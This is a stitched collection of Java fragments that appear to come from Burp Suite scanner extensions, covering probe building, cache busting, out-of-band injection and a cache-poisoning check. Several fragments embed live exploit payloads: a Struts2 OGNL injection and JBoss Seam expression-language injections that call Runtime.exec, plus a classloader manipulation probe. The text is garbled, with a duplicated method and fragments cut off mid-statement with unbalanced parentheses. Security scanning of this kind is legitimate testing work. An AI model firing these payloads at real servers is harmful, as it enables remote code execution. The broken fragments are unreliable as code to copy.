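/**
 * Builds and sends one probe request with {@code payload} placed at this
 * object's insertion point, optionally tagged with a cache buster.
 *
 * @param payload        value to put into the insertion point
 * @param needCacheBuster when true, a query parameter whose name is a fresh
 *                       canary (Utilities.generateCanary()) and whose value is
 *                       "1" is appended, so the probe is unlikely to be served
 *                       from a cache in front of the target
 * @return the request/response pair returned by Utilities.attemptRequest for
 *         the {@code service} field
 */
IHttpRequestResponse buildRequest(String payload, boolean needCacheBuster) {
    // Encode explicitly: String.getBytes() with no charset uses the JVM's
    // platform default, so the same payload could hit the wire as different
    // bytes on different hosts. UTF-8 is the default on most platforms, so
    // this matches the original there and is deterministic elsewhere.
    byte[] request = insertionPoint.buildRequest(
            payload.getBytes(java.nio.charset.StandardCharsets.UTF_8));
    if (needCacheBuster) {
        IParameter cacheBuster = burp.Utilities.helpers.buildParameter(
                Utilities.generateCanary(), "1", IParameter.PARAM_URL);
        request = burp.Utilities.helpers.addParameter(request, cacheBuster);
    }
    return burp.Utilities.attemptRequest(service, request);
}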
/**
 * Appends a parameter to the request buffer held in {@code requestBytes}.
 *
 * @param name  parameter name
 * @param value parameter value
 * @param type  Burp parameter location (IParameter.PARAM_URL, PARAM_BODY, ...)
 */
private void addParameter(String name, String value, byte type) {
    IParameter built = callbacks.getHelpers().buildParameter(name, value, type);
    byte[] updated = callbacks.getHelpers().addParameter(requestBytes, built);
    requestBytes = updated;
}
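/**
 * Builds and sends one probe request with {@code payload} placed at this
 * object's insertion point, optionally tagged with a cache buster. The
 * request goes to the service of {@code baseRequestResponse}.
 *
 * @param payload        value to put into the insertion point
 * @param needCacheBuster when true, a query parameter whose name is a fresh
 *                       canary (Utilities.generateCanary()) and whose value is
 *                       "1" is appended, so the probe is unlikely to be served
 *                       from a cache in front of the target
 * @return the request/response pair returned by Utilities.attemptRequest
 */
IHttpRequestResponse buildRequest(String payload, boolean needCacheBuster) {
    // Encode explicitly: String.getBytes() with no charset uses the JVM's
    // platform default, so the same payload could hit the wire as different
    // bytes on different hosts. UTF-8 is the default on most platforms, so
    // this matches the original there and is deterministic elsewhere.
    byte[] request = insertionPoint.buildRequest(
            payload.getBytes(java.nio.charset.StandardCharsets.UTF_8));
    if (needCacheBuster) {
        IParameter cacheBuster = burp.Utilities.helpers.buildParameter(
                Utilities.generateCanary(), "1", IParameter.PARAM_URL);
        request = burp.Utilities.helpers.addParameter(request, cacheBuster);
    }
    return burp.Utilities.attemptRequest(baseRequestResponse.getHttpService(), request);
}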
modifiedReq = helpers.addParameter(modifiedReq, helpers.buildParameter(URLDecoder.decode(pair, "UTF-8"), "", IParameter.PARAM_URL)); modifiedReq = helpers.addParameter(modifiedReq, helpers.buildParameter(URLDecoder.decode(pair.substring(0, idx), "UTF-8"), URLDecoder.decode(pair.substring(idx + 1), "UTF-8"),
newReq = helpers.addParameter(newReq, newParam);
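/**
 * Places an out-of-band (Collaborator) payload at every configured injection
 * point of {@code request} and returns the resulting request bytes.
 *
 * Each entry of {@code injectionPoints} is read as {kind, name, template}.
 * In the template, {@code %s} is replaced by the id returned by
 * {@code collab.generateCollabId(requestCode, name)} and {@code %h} by the
 * request's current Host header value. Kind "param" replaces (remove, then
 * add) a URL parameter called {@code name}; kind "header" sets a header called
 * {@code name}; any other kind is logged via Utilities.out and skipped.
 *
 * @param request     raw request to start from
 * @param requestCode correlation code handed to the Collaborator id generator
 * @return the request with all payloads injected
 */
public byte[] injectPayloads(byte[] request, Integer requestCode) {
    // Presumably to discourage intermediaries from rewriting the request so
    // the payloads reach the target as sent; whether anything honours it is
    // up to the path to the target.
    request = Utilities.addOrReplaceHeader(request, "Cache-Control", "no-transform");
    for (String[] injection : injectionPoints) {
        String kind = injection[0];
        String name = injection[1];
        String payload = injection[2].replace("%s", collab.generateCollabId(requestCode, name));
        // Host is re-read per iteration on purpose: a "header" injection that
        // targets Host changes what later %h substitutions see.
        String host = Utilities.getHeader(request, "Host");
        // Guarded: String.replace throws NullPointerException on a null
        // replacement, which would abort the whole injection run for a
        // request without a Host header (if the helper returns null for a
        // missing header — not visible here). Leave %h unexpanded instead.
        if (host != null) {
            payload = payload.replace("%h", host);
        }
        switch (kind) {
            case "param":
                IParameter param = Utilities.helpers.buildParameter(name, payload, IParameter.PARAM_URL);
                // Remove first so an existing parameter of that name is
                // replaced rather than duplicated.
                request = Utilities.helpers.removeParameter(request, param);
                request = Utilities.helpers.addParameter(request, param);
                break;
            case "header":
                request = Utilities.addOrReplaceHeader(request, name, payload);
                break;
            default:
                Utilities.out("Unrecognised injection type: " + kind);
        }
    }
    return request;
}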
case "body": httpMessage = this.burpExtensionHelpers .addParameter(httpMessage, this.burpExtensionHelpers .buildParameter(parameter.getName(), type, (byte) 1)); case "query": httpMessage = this.burpExtensionHelpers .addParameter(httpMessage, this.burpExtensionHelpers .buildParameter(parameter.getName(), type, (byte) 0));
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("pageTitle", EL_INJECTION_TEST, IParameter.PARAM_URL) );
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter(redir, "http://www.example.com/%23", IParameter.PARAM_URL) );
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter(redir, payload, IParameter.PARAM_URL) );
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("method:", "%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.hook[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString", IParameter.PARAM_URL) ); modifiedRawRequest = utf8rawRequest.replaceFirst("=", "").getBytes(); modifiedRawRequest = callbacks.getHelpers().addParameter(modifiedRawRequest, callbacks.getHelpers().buildParameter("hook", "HOOK_VAL", IParameter.PARAM_URL) );
byte[] rawSimpleRequestSeam = helpers.addParameter(rawRequest, helpers.buildParameter("actionOutcome", "/pwd.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}", IParameter.PARAM_URL) byte[] rawRequestSeam = helpers.addParameter(rawRequest, helpers.buildParameter("actionOutcome", "/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" + i + "].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}}", IParameter.PARAM_URL)
byte[] newReq = helpers.removeParameter(baseRequestResponse.getRequest(), baseParam); IParameter newParam = helpers.buildParameter(param_name, baseParam.getValue(), baseParam.getType()); newReq = helpers.addParameter(newReq, helpers.buildParameter(param_name, "", baseParam.getType())); newReq = helpers.addParameter(newReq, newParam);
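/**
 * Checks whether the reflection of {@code param} can be poisoned into a cache
 * in front of the target, and files a scan issue when it can.
 *
 * Flow: the poisoning request (insertion point set to {@code param},
 * {@code pathSuffix} appended, plus a fresh cache-buster query parameter) is
 * sent {@code i} times. Then the unmodified {@code base} request is fetched
 * under the <em>same</em> cache-buster and its response is searched for the
 * "wrtqv" marker (expected to be carried by the poisoning payload — the caller
 * is responsible for that; it is not visible here). A hit means a request that
 * never sent the payload was served the poisoned entry. A follow-up probe
 * appends "~zxcv\rvcz" to the value; if that CR-bearing marker comes back
 * inside the response's header section the issue is reported as "Severe cache
 * poisoning", since the reflection then reaches response headers.
 *
 * @param injector         supplies the target service and the insertion point
 * @param param            candidate value to reflect
 * @param base             unmodified request/response used for the victim fetch
 * @param attackDedication upper bound of both retry loops
 * @param i                number of poisoning attempts (loops run from
 *                         attackDedication - i up to attackDedication)
 * @param pathSuffix       appended to the path of every probe
 * @return true when poisoning was observed and an issue was added
 */
private boolean tryReflectCache(PayloadInjector injector, String param, IHttpRequestResponse base, int attackDedication, int i, String pathSuffix) {
    IHttpService service = injector.getService();
    byte[] setPoisonReq = Utilities.appendToPath(
            injector.getInsertionPoint().buildRequest(Utilities.helpers.stringToBytes(param)), pathSuffix);
    // One cache-buster shared by the poisoning requests and the victim fetch:
    // they must map to the same cache key for the check to mean anything.
    IParameter cacheBuster = Utilities.helpers.buildParameter(Utilities.generateCanary(), "1", IParameter.PARAM_URL);
    setPoisonReq = Utilities.helpers.addParameter(setPoisonReq, cacheBuster);
    for (int j = attackDedication - i; j < attackDedication; j++) {
        Utilities.attemptRequest(service, setPoisonReq);
    }
    // Victim fetches are spaced out (every third step) rather than one per poison attempt.
    for (int j = attackDedication - i; j < attackDedication; j += 3) {
        IHttpRequestResponse getPoison = Utilities.attemptRequest(service,
                Utilities.appendToPath(Utilities.helpers.addParameter(base.getRequest(), cacheBuster), pathSuffix));
        // A failed fetch (no response) is treated as "not poisoned" for this round.
        if (getPoison == null || getPoison.getResponse() == null
                || !Utilities.containsBytes(getPoison.getResponse(), "wrtqv".getBytes())) {
            continue;
        }
        Utilities.log("Successful cache poisoning check");
        String title = "Cache poisoning";
        byte[] headerSplitReq = Utilities.appendToPath(
                injector.getInsertionPoint().buildRequest(Utilities.helpers.stringToBytes(param + "~zxcv\rvcz")), pathSuffix);
        cacheBuster = Utilities.helpers.buildParameter(Utilities.generateCanary(), "1", IParameter.PARAM_URL);
        byte[] headerSplitResp = Utilities.attemptRequest(service,
                Utilities.helpers.addParameter(headerSplitReq, cacheBuster)).getResponse();
        // Fix: the original cut the response at getBodyStart(headerSplitReq),
        // i.e. the body offset of the *request*, so the "header section" it
        // searched was an arbitrary prefix of the response. The response's
        // own header/body boundary is what decides whether the CR landed in
        // a header. A missing response simply keeps the lower severity.
        if (headerSplitResp != null
                && Utilities.containsBytes(
                        Arrays.copyOfRange(headerSplitResp, 0, Utilities.getBodyStart(headerSplitResp)),
                        "zxcv\rvcz".getBytes())) {
            title = "Severe cache poisoning";
        }
        title = title + " " + i;
        Utilities.callbacks.addScanIssue(new CustomScanIssue(getPoison.getHttpService(), Utilities.getURL(getPoison), getPoison, title,
                "Cache poisoning: '" + param + "'. Disregard the request and look for wrtqv in the response",
                "High", "Firm", "Investigate"));
        return true;
    }
    return false;
}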
switch (samlContent.getType()) { case IParameter.PARAM_URL: currentMessage = helpers.addParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, IParameter.PARAM_BODY)); break; case IParameter.PARAM_BODY: currentMessage = helpers.addParameter(currentMessage, helpers.buildParameter(samlContent.getName(), input, IParameter.PARAM_URL)); break; currentMessage = helpers.addParameter(currentMessage,param);
byte[] newRequest = helpers.addParameter( messageInfo.getRequest(), helpers.buildParameter("token", token, IParameter.PARAM_BODY));
modifiedRawRequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("Class.classLoader.URLs[0]", classLoaderStringTest, IParameter.PARAM_URL)
rawrequest = callbacks.getHelpers().addParameter(rawrequest, callbacks.getHelpers().buildParameter("debug", "console", IParameter.PARAM_URL) );
testReq = Utilities.helpers.addParameter(testReq, testCacheBuster); IHttpRequestResponse testResp = Utilities.attemptRequest(injector.getService(), testReq);
/**
 * Makes a request cache-unfriendly before it is sent.
 *
 * First, every occurrence of the literal placeholder "$randomplz" in the
 * request is replaced by a fresh canary and the Content-Length is fixed up.
 * Then, per the global settings, a URL parameter with value "1" is appended,
 * named by a fresh canary ("Add dynamic cachebuster") or the fixed string
 * "fcbz" ("Add 'fcbz' cachebuster"); the dynamic setting wins when both are
 * on, and with neither on no parameter is added.
 *
 * @param messageInfo request holder; its request is updated in place via setRequest
 */
private void addCacheBusters(IHttpRequestResponse messageInfo) {
    byte[] placeholder = Utilities.helpers.stringToBytes("$randomplz");
    byte[] current = messageInfo.getRequest();
    boolean hasPlaceholder = Utilities.countMatches(current, placeholder) > 0;
    if (hasPlaceholder) {
        byte[] canary = Utilities.helpers.stringToBytes(Utilities.generateCanary());
        byte[] substituted = Utilities.replace(current, placeholder, canary);
        messageInfo.setRequest(Utilities.fixContentLength(substituted));
    }

    String busterName = pickCacheBusterName();
    if (busterName == null) {
        return;
    }
    IParameter buster = burp.Utilities.helpers.buildParameter(busterName, "1", IParameter.PARAM_URL);
    messageInfo.setRequest(Utilities.helpers.addParameter(messageInfo.getRequest(), buster));
}

/** Cache-buster parameter name chosen by the global settings, or null when neither option is enabled. */
private String pickCacheBusterName() {
    if (Utilities.globalSettings.getBoolean("Add dynamic cachebuster")) {
        return Utilities.generateCanary();
    }
    if (Utilities.globalSettings.getBoolean("Add 'fcbz' cachebuster")) {
        return "fcbz";
    }
    return null;
}